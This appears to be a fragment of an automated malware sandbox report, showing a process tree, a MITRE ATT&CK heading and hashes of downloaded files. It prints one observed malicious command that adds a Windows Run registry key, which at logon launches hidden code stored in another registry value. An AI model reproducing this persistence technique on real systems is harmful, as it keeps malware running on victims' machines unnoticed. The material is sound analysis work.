C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:1704
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:81⤵PID:4648
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD523da8c3612b391292f5cdc51f7bcb018
SHA1eb345ba5705c1e629c8c44198b812619229693d3
SHA2566cbc26e82f2a553f9828216b6851b859f57f05df2350666818965cd1e0064a28
SHA512612c76f6045e861bbe0554ac69a57357bcfd68dbab0954e78db1009d5a71e551704880847f146dc43f934d4a8ce9d5e9b4b163a8acdb5401f44a2ef65ee790e7
-
Filesize
4KB
MD5712c85f7347b1b9f2288a220c96b841e
SHA1790e35b7d500cea6961c44011d958a2013768378
SHA25670187e88c8446bdaa3eb7ea3bfc0db33c1f2e9641b5db95d0fa22dad724eb981
SHA5121881a8c4156b12745c414736b68b21df4113dbf9c2744b04d6bbfe7dbc7f7336293b5cdc8008eafb59afa4314affec831d83d6d3b34d3e36b25d831e40cdd972
-
Filesize
446B
MD54b9bc21c7f74f2fd1c8ef11ea8c09490
SHA1296a36eb7687b0436228329baa38f0256f13cd4d
SHA256254427b2bba5cc34f90ad8877a55e16062511b746870497c596a215d2e3eb949
SHA512ed794cc51a27af7a6e571f68b854f1ac004c16c943939863e7a51e3dae449425f45d78445bfd24710823481ce4acfc61c92d639a4b14da52f67d1f41455f464a
-
Filesize
3KB
MD562848a3b8e3b67b5b36a517ad40a402a
SHA131db8d0589625d582c55a87c7877fcaa8c1b19ff
SHA256e070df27506a03e268388353f1de976f4e7c9c5ab152a48d8dc80f87c78ddd4e
SHA512912cc731a569a3ee5c0f8c1f902c76f358e8366385f24d9bb59f8fffc530c408f7429c67dc3dab05b280f1903a8cc9fec6c927cd7c5daa3b27a1beb4a278a6ac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
475KB
MD5c990e3d829b26e351547c77df1bc5953
SHA1df0592b47bea01cc3199012205c3bf55545fb09e
SHA256f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
SHA512f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da